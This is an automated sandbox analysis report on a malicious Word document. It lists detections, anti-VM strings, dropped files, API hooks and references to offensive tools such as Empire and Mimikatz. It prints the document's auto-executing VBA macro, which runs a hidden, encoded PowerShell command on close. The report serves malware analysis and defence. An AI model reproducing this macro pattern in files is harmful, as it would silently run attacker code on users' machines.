13272bdbbae69fddddb6e289f8bf603e
This report is generated from a file or URL submitted to this webservice on June 3rd 2021 18:03:12 (UTC) and action script Heavy Anti-Evasion
Guest System: Windows 7 32 bit, Professional, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by
Falcon Sandbox v8.48.7 © Hybrid Analysis
Incident Response
Risk Assessment
- Evasive
-
Found a reference to a WMI query string known to be used for VM detection
Possibly tries to implement anti-virtualization techniques
MITRE ATT&CK™ Techniques Detection
Indicators
-
Malicious Indicators 6
-
External Systems
-
Sample was identified as malicious by a large number of Antivirus engines
- details
- 28/64 Antivirus vendors marked sample as malicious (43% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 28/64 Antivirus vendors marked sample as malicious (43% detection rate)
- source
- External System
- relevance
- 8/10
-
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
-
Pattern Matching
-
YARA signature match
- details
-
YARA signature "Hacktool_Strings_p0wnedShell" matched file "all.bstring" as "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs" based on indicators: "Invoke-Mimikatz" (Reference: https://github.com/Cn33liz/p0wnedShell, Author: Florian Roth)
YARA signature "Bolonyokte" classified file "all.bstring" as "rat" based on indicators: "login,en ligne,Power" (Author: Jean-Philippe Teissier / @Jipe_) - source
- YARA Signature
- relevance
- 10/10
-
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "AutoClose" which indicates: "Runs when the Word document is closed"
- source
- Static Parser
- relevance
- 10/10
- ATT&CK ID
- T1137
-
-
-
Suspicious Indicators 4
-
Environment Awareness
-
Found a reference to a WMI query string known to be used for VM detection
- details
- "Win32_Process -> Vmtools, VBoxService (very tedious, not very effective!)" (Indicator: "win32_process"; File: "~WRS_432660EC-736E-4C2B-9F73-C88B5FB46D6A_.tmp")
- source
- File/Memory
- relevance
- 10/10
- ATT&CK ID
- T1047
-
Possibly tries to implement anti-virtualization techniques
- details
-
"Win32_Process -> Vmtools, VBoxService (very tedious, not very effective!)" (Indicator: "vbox")
"Win32_Process -> Vmtools, VBoxService (very tedious, not very effective!)" (Indicator: "vboxservice")
"Win32_Process -> Vmtools, VBoxService (very tedious, not very effective!)" (Indicator: "vmtools") - source
- File/Memory
- relevance
- 4/10
- ATT&CK ID
- T1497
-
-
General
-
Found a potential E-Mail address in binary/memory
- details
-
Pattern match: "ajanvrin520@beijaflore.com"
Pattern match: "jamarir817@beijaflore.com"
Pattern match: "domaine@cu2016.local"
Pattern match: "_fx@g7q.a"
Pattern match: "_gqw7g@hyrc8.odcylj"
Pattern match: "q@jv.dybehww"
Pattern match: "miteu@6u.ioc"
Pattern match: "vp@mph0.p4c"
Pattern match: "sl-us@s.ic3g"
Pattern match: "hus@s._"
Pattern match: "u@wp.qh"
Pattern match: "aor9@bni3i.o"
Pattern match: "mo@z6w.w"
Pattern match: "bl@_fwidfu.ztv2"
Pattern match: "sz@sr.s"
Pattern match: "e55s@q.j"
Pattern match: "t@w.g"
Pattern match: "ixus@n.el"
Pattern match: "w@.l8p.fhn5"
Pattern match: "k2-d9e@a.3" - source
- File/Memory
- relevance
- 3/10
- ATT&CK ID
- T1114
-
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
-
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "WScript.Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "Run" which indicates: "May run an executable file or a system command"
Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
Found suspicious keyword "PowerShell" which indicates: "May run PowerShell commands" - source
- Static Parser
- relevance
- 10/10
- ATT&CK ID
- T1204
-
-
Informative 15
-
General
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "VBA/ThisDocument") has code: "Sub AutoClose()
B
End Sub
Public Function B() As Variant
Dim p As String
p = "powershell -noP -sta -w 1 -enc JgAoACAAJABFAE4Adg"
Set asd = CreateObject("WScript.Shell")
asd.Run (p)
End Function" - source
- Static Parser
- relevance
- 10/10
- ATT&CK ID
- T1204
-
Creates a writable file in a temporary directory
- details
- "WINWORD.EXE" created file "%TEMP%\msoFB27.tmp"
- source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"Global\MTX_MSO_Formal1_S-1-5-21-2092356043-4041700817-663127204-1001"
"Global\552FFA80-3393-423d-8671-7BA046BB5906"
"Global\MTX_MSO_AdHoc1_S-1-5-21-2092356043-4041700817-663127204-1001"
"Local\10MU_ACB10_S-1-5-5-0-70070"
"Local\ZonesLockedCacheCounterMutex"
"Local\10MU_ACBPIDS_S-1-5-5-0-70070"
"Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906" - source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
- Antivirus vendors marked dropped file "~_272bdbbae69fddddb6e289f8bf603e.doc" as clean (type is "data")
- source
- Binary File
- relevance
- 10/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 61E20000
- source
- Loaded Module
- ATT&CK ID
- T1179
-
Removes Office resiliency keys (often used to avoid problems opening documents)
- details
-
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: " I#")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "NK#")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: ">F#")
"WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim"
"WINWORD.EXE" searching for class "NetUICtrlNotifySink"
"WINWORD.EXE" searching for class "REListbox20W"
"WINWORD.EXE" searching for class "OfficeTooltip"
"WINWORD.EXE" searching for class "MsoCommandBarPopup" - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1010
-
Spawns new processes
- details
- Spawned process "powershell.exe"
- source
- Monitored Target
- relevance
- 3/10
-
-
Installation/Persistence
-
Chained signature (with api-8702...). Detects file write then load as module
- details
- Chained signature (with api-8702...). Detects file write then load as module
- source
- Loaded Module
- relevance
- 8/10
-
Dropped files
- details
-
"~_272bdbbae69fddddb6e289f8bf603e.doc" has type "data"
"13272bdbbae69fddddb6e289f8bf603e.LNK" has type "MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jun 3 16:04:52 2021, mtime=Thu Jun 3 16:04:52 2021, atime=Thu Jun 3 16:05:11 2021, length=2648707, window=hide"
"8627D596.png" has type "PNG image data 591 x 118 8-bit/color RGB non-interlaced"
"9CAAB221.png" has type "PNG image data 690 x 643 8-bit/color RGB non-interlaced"
"C19B2C8C.png" has type "PNG image data 1625 x 99 8-bit/color RGBA non-interlaced"
"MSO1036.acl" has type "data"
"D89612A0.png" has type "PNG image data 981 x 92 8-bit/color RGB non-interlaced"
"~WRS_432660EC-736E-4C2B-9F73-C88B5FB46D6A_.tmp" has type "data"
"37590EF7.png" has type "PNG image data 620 x 118 8-bit/color RGBA non-interlaced"
"A6C22666.png" has type "PNG image data 901 x 293 8-bit/color RGBA non-interlaced"
"931E972F.png" has type "PNG image data 412 x 81 8-bit/color RGB non-interlaced"
"79520336.png" has type "PNG image data 271 x 91 8-bit/color RGBA non-interlaced"
"1E34ECB4.png" has type "PNG image data 640 x 242 8-bit/color RGBA non-interlaced"
"99725241.png" has type "PNG image data 943 x 54 8-bit/color RGBA non-interlaced"
"24D0B1D.png" has type "PNG image data 749 x 197 8-bit/color RGBA non-interlaced"
"7D8D2667.png" has type "PNG image data 590 x 168 8-bit/color RGB non-interlaced"
"9C004E2D.png" has type "PNG image data 638 x 82 8-bit/color RGBA non-interlaced"
"index.dat" has type "data"
"13F74E14.png" has type "PNG image data 559 x 214 8-bit/color RGB non-interlaced"
"DEFA43B9.png" has type "PNG image data 490 x 325 8-bit/color RGBA non-interlaced" - source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\AppPatch\sysmain.sdb"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.MSO\359B47DC.png"
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000027.db"
"WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui" - source
- API Call
- relevance
- 7/10
-
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "beijaflore.com"
Pattern match: "https://github.com/BC-SECURITY/DEFCON27"
Pattern match: "https://www.youtube.com/watch?v=F_BvtXzH4a4"
Pattern match: "https://www.youtube.com/watch?v=6J8pw_bM-i4"
Pattern match: "https://github.com/cobbr/PSAmsi"
Pattern match: "https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py"
Pattern match: "https://www.virustotal.com/gui/"
Pattern match: "https://github.com/EmpireProject/Empire/blob/master/lib/powershell/Invoke-Obfuscation/Invoke-Obfuscation.ps1"
Pattern match: "https://twitter.com/_vinnybod/status/1386442836417994752"
Pattern match: "https://python-poetry.org/"
Pattern match: "https://xlsxwriter.readthedocs.io/"
Pattern match: "https://github.com/BC-SECURITY/Empire/pull/457"
Pattern match: "https://github.com/BC-SECURITY/Empire/commits/master/lib/common/bypasses.py"
Pattern match: "https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Invoke-Obfuscation.psd1"
Pattern match: "https://pypi.org/project/click/"
Pattern match: "https://github.com/Beijaflore-Security-LAB/EmpireExceller"
Pattern match: "https://github.com/BC-SECURITY/Empire"
Heuristic match: "> ./golden_ticket.py"
Heuristic match: "> ./logon_passwords.py"
Heuristic match: "> ./lsadump.py"
Heuristic match: "> ./sam.py"
Pattern match: "http://localhost:7474/"
Pattern match: "https://localhost:1337/api/admin/login"
Pattern match: "https://localhost:1337/api/map?token="
Pattern match: "https://localhost:1337/api/modules?token=%3cTOKEN"
Heuristic match: "(Get-Command).Name"
Heuristic match: "poetry run ./empire_exceller.py"
Heuristic match: "/usr/share/powershell-empire/lib/modules/powershell/collection/browser_data.py"
Pattern match: "DOCNAME.docm/Microsoft"
Pattern match: "https://amsi.fail/"
Heuristic match: "QscYe_8] kO~Iu+CK}NX_a1+cfLoC*)pkEyu]XQ|>8T>(g('H+}e%9tUoE?el.ax"
Heuristic match: "Le$7xk<?M)!~z/z<{}Y[`m?4[qwU C?'}s9!WhevTqWhei~y.n>$%Vp.><yN);O?j$y-HXQVKFP:/fCY3v^ <@.=p#.ZA"
Pattern match: "RkQ.XkT/6&|@P4OJMVSQzPtr5!G"
Pattern match: "r.Mu/@kFSCeR2P"
Heuristic match: "<_D.221$L]:7']&j&|AEGD%?9i&rVz&P1{yE9]I/ft5?'/B:jo D1E6m0QQGw?M6QGEO:3t_%D`N#fU\%Vj8U?X%xPfori[O'|5;CL &~9Aty|*YPv}:oMx^<31-P-w/:h}L[BUTkg(Nf)8r&jjDe^~35.Cr"
Heuristic match: "zj_#Lo%Y]dN&]aW@Yi$6SEL].gT"
Pattern match: "1Pa.AP//kdAC$o"
Heuristic match: "d;^BhX*$+aEIt.Su"
Pattern match: "G.nw/t[W;j?#KEZKpRvpGx,b~eA0D/k" - source
- File/Memory
- relevance
- 10/10
-
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
-
"https://www.youtube.com/watch?v=F_BvtXzH4a4" (Indicator: "youtube")
"https://www.youtube.com/watch?v=6J8pw_bM-i4" (Indicator: "youtube")
"https://twitter.com/_vinnybod/status/1386442836417994752" (Indicator: "twitter")
"HYPERLINK "https://www.youtube.com/watch?v=F_BvtXzH4a4" https://www.youtube.com/watch?v=F_BvtXzH4a4" (Indicator: "youtube")
"HYPERLINK "https://www.youtube.com/watch?v=6J8pw_bM-i4" https://www.youtube.com/watch?v=6J8pw_bM-i4" (Indicator: "youtube")
"HYPERLINK "https://twitter.com/_vinnybod/status/1386442836417994752" https://twitter.com/_vinnybod/status/1386442836417994752" (Indicator: "twitter") - source
- File/Memory
- relevance
- 7/10
-
-
System Security
-
Hooks API calls
- details
-
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179
-
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "e6c80e3d" to virtual address "0x67E478E4" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "e9d73287ef" to virtual address "0x773B47BA" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "f8110000" to virtual address "0x754A1408" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "b89012f870ffe0" to virtual address "0x754A1248" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48124a75" to virtual address "0x754B8348" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "9b7c0e3d" to virtual address "0x6934F530" (part of module "WWLIB.DLL")
"WINWORD.EXE" wrote bytes "f8110000" to virtual address "0x754A12CC" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "f8114a75" to virtual address "0x754B834C" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "b88011f870ffe0" to virtual address "0x75A01368" (part of module "WS2_32.DLL")
"WINWORD.EXE" wrote bytes "48124a75" to virtual address "0x754B83C0" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "5205cd3c" to virtual address "0x66E40BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "3be20c3d" to virtual address "0x6E3DCA70" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "f8114a75" to virtual address "0x754B83C4" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48120000" to virtual address "0x754A139C" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48120000" to virtual address "0x754A12DC" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48124a75" to virtual address "0x754B83DC" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "e9848e31ef" to virtual address "0x778CF71B" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "1e7300d9" to virtual address "0x61F710AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "e9c45487ef" to virtual address "0x773B3F20" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e9ab9989ef" to virtual address "0x773B5D66" ("VariantChangeType@OLEAUT32.DLL") - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179
-
File Details
13272bdbbae69fddddb6e289f8bf603e
- Filename
- 13272bdbbae69fddddb6e289f8bf603e
- Size
- 2.5MiB (2648707 bytes)
- Type
- docx office
- Description
- Microsoft Word 2007+
- Architecture
- WINDOWS
- SHA256
- c96ab20d969e27333a77b49ba7da2fd426f58955f7f3284058bf29257118cf0c
- MD5
- 13272bdbbae69fddddb6e289f8bf603e
- SHA1
- 690fce07eb9b03141713eb76a7bad05a337e399d
- ssdeep
- 49152:dJDkEs+VYalj+aNmyGkKm4u6omflhWI5Ne0UkRqANFY8qi0dVP:dls+VFj+aNm26oGrp5PUkZNFYt/DP
Hybrid Analysis
Analysed 2 processes in total.
-
WINWORD.EXE
/n "C:\13272bdbbae69fddddb6e289f8bf603e.doc"
(PID: 3240)
- powershell.exe (PID: 3024)
Network Analysis
DNS Requests
No relevant DNS requests were made.
Contacted Hosts
No relevant hosts were contacted.
HTTP Traffic
No relevant HTTP requests were made.
Extracted Strings
Extracted Files
Displaying 21 extracted file(s). The remaining 40 file(s) are available in the full version and XML/JSON reports.
-
Clean 1
-
-
~_272bdbbae69fddddb6e289f8bf603e.doc
- Size
- 162B (162 bytes)
- Type
- data
- AV Scan Result
- 0/59
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- b60c0bb79b4b53294d99905c973caba3
- SHA1
- a7716d014025ca03b5324c8220e2459eea70b6b1
- SHA256
- a101d3605f8d1ca5cfb10c48dbdb24c45f2627c48f44a2bd2604b88c7b90d5f0
-
-
Informative 20
-
-
13272bdbbae69fddddb6e289f8bf603e.LNK
- Size
- 573B (573 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jun 3 16:04:52 2021, mtime=Thu Jun 3 16:04:52 2021, atime=Thu Jun 3 16:05:11 2021, length=2648707, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- a9a38aa115a93c66b692ae6c44a00ee9
- SHA1
- 0b467508a09bf53f1259751e7f803c921b156887
- SHA256
- 0bfda16f2af5a0d87504337aa3727cb76ce9570db8d2260774000d666bb021a2
-
index.dat
- Size
- 160B (160 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 3ea782f37cb053f63c4b00c1a561f75a
- SHA1
- ff9a8dac81539357ae3e93f490b92ad0e8ede308
- SHA256
- 3b4f9464af04f540de0d2e497a3a3455c0e9777a3bc25a304534ed3803323bbd
-
273C961E.png
- Size
- 71KiB (72725 bytes)
- Type
- img image
- Description
- PNG image data, 947 x 144, 8-bit/color RGB, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 2ba567b4dd7e4cbe10410bf803647ecb
- SHA1
- 151231e5fa4bb4e86517eed6259600723f4b74ec
- SHA256
- f042dda70c10b4924f7af4b207e3dfa5e4f99d8f67fe22c6733cbb745cac28fb
-
359B47DC.png
- Size
- 171KiB (175234 bytes)
- Type
- img image
- Description
- PNG image data, 1278 x 289, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 0c03e68bf5688bdd0270de5cbdbc0933
- SHA1
- 1b2f5549f5253bb6511425c9b65d38ea03340f8b
- SHA256
- 5a640283df70e343fdecc2f82af91111b9537cdf254a7f0aff0ce36c57344809
-
CAD19387.png
- Size
- 70KiB (71716 bytes)
- Type
- img image
- Description
- PNG image data, 445 x 425, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 6f89583d5212315f29c5198832207130
- SHA1
- 97f607577e3c59be5d302d90c5b26d3a2a4342b8
- SHA256
- 16819544e58c8636e4697322ad78830b692f0501f5b598def7feb33ea4705b56
-
8627D596.png
- Size
- 13KiB (12844 bytes)
- Type
- img image
- Description
- PNG image data, 591 x 118, 8-bit/color RGB, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 87b3ff35a03a5e0054871144d3359488
- SHA1
- 70fe953289ae55b0d0c43cf2b38b3d091141e4af
- SHA256
- 24c905eeff633d7d573bcb0555701bad6f8e6706ac6f33abfe79d72302fe02cd
-
9CAAB221.png
- Size
- 96KiB (98306 bytes)
- Type
- img image
- Description
- PNG image data, 690 x 643, 8-bit/color RGB, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- eb9cad6d41c40009a31bb6ec6547d4c0
- SHA1
- 9c678b36a688d29ea008fe8a2a13079d1fe8b727
- SHA256
- 9e46d731fb61696583ee3dbf9d0b45d7fc4dc9d791abad161e4f806e14ad595a
-
C19B2C8C.png
- Size
- 76KiB (77999 bytes)
- Type
- img image
- Description
- PNG image data, 1625 x 99, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 5982b8d4a7d38ca1091c3a725e3d5b4d
- SHA1
- 5929c76757a9e4f5fadf01ca96190af0c2c7d60a
- SHA256
- 976bab72cb4e38da233b5881296dbac302651cb1f03206ff961a599335fc2bd5
-
MSO1036.acl
- Size
- 43KiB (43558 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- a6143a67ec46c532d891d5a640efc58b
- SHA1
- efa059fd418e777316c128701e351a4f4a053766
- SHA256
- 89d24d19b8379a9f592d3f4210398173f4522249aef1c3b8127363342ec616d9
-
D89612A0.png
- Size
- 5.1KiB (5175 bytes)
- Type
- img image
- Description
- PNG image data, 981 x 92, 8-bit/color RGB, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- ccdb75da7cda63761a00b588a0d75d16
- SHA1
- 6d5015522d85c51737be8ed110c9b39e19f0d45b
- SHA256
- 1338e78c8b5d9c743fba2d6aca01eca84d47e5f3b67f389722ab39dada4a5ca3
-
~WRS_432660EC-736E-4C2B-9F73-C88B5FB46D6A_.tmp
- Size
- 106KiB (108120 bytes)
- Type
- doc office
- Description
- data
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 58a36a8c8f818293357e79e6136b62b1
- SHA1
- 08beaba27f8852e9e5eaa78868ce478f81f8b76b
- SHA256
- 7f2226f31f0567a5f25cb227ff452b96db6717e57799ace6ac934449331aa045
-
37590EF7.png
- Size
- 48KiB (49451 bytes)
- Type
- img image
- Description
- PNG image data, 620 x 118, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 7794b532fea093edb2f96cfbc0ccca97
- SHA1
- 1da970f264160e1d1abff311efed6413bd8e5eb9
- SHA256
- 2ed3461e82031ffa9c428de27b4decf0ea912987616e9a6d5228f65dfbb98f9d
-
A6C22666.png
- Size
- 24KiB (24289 bytes)
- Type
- img image
- Description
- PNG image data, 901 x 293, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 995c5c0ebee5859894704ed944e0b231
- SHA1
- 1915ab65b5aa8fffaaab92f1741b6b15fcc37250
- SHA256
- ae2d960bd690b2b8e7c5ea9002176994730da9ddd565f01a2bfbe83fcc3360a2
-
931E972F.png
- Size
- 5.6KiB (5785 bytes)
- Type
- img image
- Description
- PNG image data, 412 x 81, 8-bit/color RGB, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 7c143996f6f5fc7341ba2a6cf3c1854b
- SHA1
- d9c7648ed62bd193238d38ae955a1733c24a28eb
- SHA256
- ca4a5540e3af9ecd58f3bf8d3d7015fc596c3038d86cfb9d7fe5114b1f065ec0
-
79520336.png
- Size
- 11KiB (11528 bytes)
- Type
- img image
- Description
- PNG image data, 271 x 91, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- ad5cd9372eb16f3251004b8b13fa1eb7
- SHA1
- fab1ee3849a3e67f171c2747e91d9e12f003c876
- SHA256
- dd06fcfb77defee6d877eaa1efdeb1adfad1c64bc84edea49d9b7ffc6f0da1c6
-
1E34ECB4.png
- Size
- 21KiB (21238 bytes)
- Type
- img image
- Description
- PNG image data, 640 x 242, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 8d5bf06bc3b9b6ec6f67c9073d2f1ae1
- SHA1
- 78ed69fae18436be365eb1e0d41d07c9e1e43662
- SHA256
- c0b256f1b26d3fc4a1df3864162317829cfa2c53b7f706002fd100a8afc403c2
-
99725241.png
- Size
- 20KiB (20721 bytes)
- Type
- img image
- Description
- PNG image data, 943 x 54, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- df6cd454045aff33a250c73c37883111
- SHA1
- f920c70ac23148d8d31e6ff2e98554a144c51db6
- SHA256
- 33bfc48cd39d31db5b4e042be5624291d3b8bd0e1ea9263f5d066449ce1b77b6
-
24D0B1D.png
- Size
- 16KiB (16301 bytes)
- Type
- img image
- Description
- PNG image data, 749 x 197, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 4507547bc5b073197b09afb3d6b2671c
- SHA1
- aadb254f90f3bd7981e07df978b6d42021e55599
- SHA256
- 3af6630e4e273e7a95c9ff4c4f6d3899202cf422bfc60939f236784d09e8caf6
-
7D8D2667.png
- Size
- 14KiB (14302 bytes)
- Type
- img image
- Description
- PNG image data, 590 x 168, 8-bit/color RGB, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- 6f00abaad594ea359a840326a487da49
- SHA1
- dc2ea6ffccf62f3f5bb649e119f6e577df03c241
- SHA256
- 40cd19f3b447f59a70f976906175cbe5d2a32aa8ffcd2cd4ab412f2042ed4c18
-
~_Normal.dotm
- Size
- 162B (162 bytes)
- Runtime Process
- WINWORD.EXE (PID: 3240)
- MD5
- b60c0bb79b4b53294d99905c973caba3
- SHA1
- a7716d014025ca03b5324c8220e2459eea70b6b1
- SHA256
- a101d3605f8d1ca5cfb10c48dbdb24c45f2627c48f44a2bd2604b88c7b90d5f0
-
Notifications
-
Runtime
- Network whitenoise filtering was applied
- Not all IP/URL string resources were checked online
- Not all process commandlines are present
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "binary-0" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "string-63" are available in the report